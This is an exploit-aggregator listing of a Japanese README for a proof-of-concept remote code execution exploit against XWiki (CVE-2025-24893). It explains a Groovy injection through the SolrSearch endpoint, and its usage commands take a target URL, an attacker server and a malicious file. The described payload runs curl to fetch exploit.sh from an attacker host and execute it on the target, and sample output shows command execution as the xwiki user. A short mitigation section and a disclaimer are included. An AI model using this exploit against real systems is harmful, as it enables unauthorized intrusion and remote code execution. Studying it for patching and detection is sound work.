Sploitus

Exploit for xwiki-cve-2025-24893-poc

kitploit · 2026-09-07

Exploit Code

MARKDOWN129 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-570RMBR3AK3R-XWIKI-CVE-2025-24893-POC
# XWiki RCE エクスプロイト PoC (CVE-2025-24893)

## 概要

このリポジトリには、CVE-2025-24893 として特定された **XWiki Remote Code Execution (RCE)** 脆弱性の概念実証 (PoC) エクスプロイトが含まれています。この脆弱性により、攻撃者は SolrSearch エンドポイントへの巧妙に細工されたリクエストを利用して、対象の XWiki インスタンス上で任意のコードを実行できます。このスクリプトは HTTP と HTTPS の両ターゲットをサポートします。

**⚠️ 免責事項** : この PoC は教育および研究目的のみを意図しています。明示的な許可なくシステムに対してこのコードを不正に使用することは違法であり、非倫理的です。システムをテストする前に、必ず適切な許可を取得してください。

## 脆弱性の詳細

  * **CVE ID** : CVE-2025-24893
  * **影響を受けるコンポーネント** : XWiki SolrSearch エンドポイント
  * **影響** : リモートコード実行 (RCE)
  * **アドバイザリ** : GitHub Security Advisory



この脆弱性は、SolrSearch エンドポイントでのユーザー入力の不適切な処理に起因し、巧妙に細工されたペイロードを介して Groovy コードの注入を可能にします。この PoC は、攻撃者がこれを悪用して対象サーバー上で任意のコマンドを実行する方法を示しています。

## 前提条件

  * Python 3.x
  * 必要な Python ライブラリ: `requests`、`argparse`、`urllib.parse`、`re`、`html`
  * CVE-2025-24893 の影響を受ける XWiki インスタンス
  * 攻撃者が制御するサーバー (bash スクリプトをホストするため、HTTP または HTTPS でアクセス可能)
  * 対象上で実行するコードを含むファイル



## インストール

  1. このリポジトリをクローンします: 

root@kitploit:~
         
         git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
         

  2. 必要な Python ライブラリをインストールします: 

root@kitploit:~
         
         pip install requests
         




## 使用方法

スクリプトは、ターゲット XWiki インスタンスに巧妙に細工された HTTP/HTTPS リクエストを送信し、攻撃者が制御するサーバーからファイルを取得して実行する `curl` コマンドを実行する Groovy ペイロードを注入します。

次のコマンドでスクリプトを実行します:

root@kitploit:~
    
    
    python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]
    

### 引数

  * `--url`: ターゲット XWiki インスタンスのベース URL (例: `http://target` または `https://target`)。
  * `--server`: 攻撃者のサーバーの IP またはホスト名 (必要に応じてポートを含む) (例: `192.168.1.100:8080`)。HTTP と HTTPS の両方をサポートします。
  * `--file`: 実行するコードを含む、攻撃者のサーバー上のファイル名 (例: `exploit.sh`)。
  * `--no-verify`: HTTPS ターゲットの SSL 検証を無効にするオプションのフラグ (注意して使用し、テスト目的のみ)。



### 例

root@kitploit:~
    
    
    python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh
    

SSL 検証をバイパスするには (例: 自己署名証明書の場合):

root@kitploit:~
    
    
    python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify
    

これにより、次の処理が行われます:

  1. Groovy スクリプトを使用して `curl` コマンドを実行するペイロードを構築します。
  2. 攻撃者のサーバー (`http(s)://192.168.1.100:8080`) から指定されたファイル (`exploit.sh`) を取得します。
  3. 取得したファイルをターゲットシステム上で実行します。
  4. 出力を抽出して表示し、HTML タグやエンティティを除去します。



## 出力

スクリプトはターゲットからのレスポンスを抽出し、HTML タグ (例: `<br/>`、`<del>`) を除去し、HTML エンティティを読みやすいプレーンテキストに変換します。クリーン化された出力がコンソールに表示されます。

## サンプル

root@kitploit:~
    
    
    python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
    uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
    

## 制限事項

  * ターゲットの XWiki インスタンスが CVE-2025-24893 の影響を受ける必要があります。
  * 攻撃者のサーバーはターゲットシステムから HTTP または HTTPS 経由でアクセス可能である必要があります。
  * スクリプトは、ターゲットサーバーが SolrSearch エンドポイントと Groovy 実行をサポートしていることを前提としています。



## 緩和策

この脆弱性から保護するには:

  * XWiki を最新のパッチ適用済みバージョンに更新します。
  * 詳細な緩和手順については GitHub Security Advisory を参照してください。
  * ブログ記事 CVE-2025-24893 も参照してください。



## ライセンス

このプロジェクトは MIT ライセンスの下で提供されています。詳細については LICENSE ファイルを参照してください。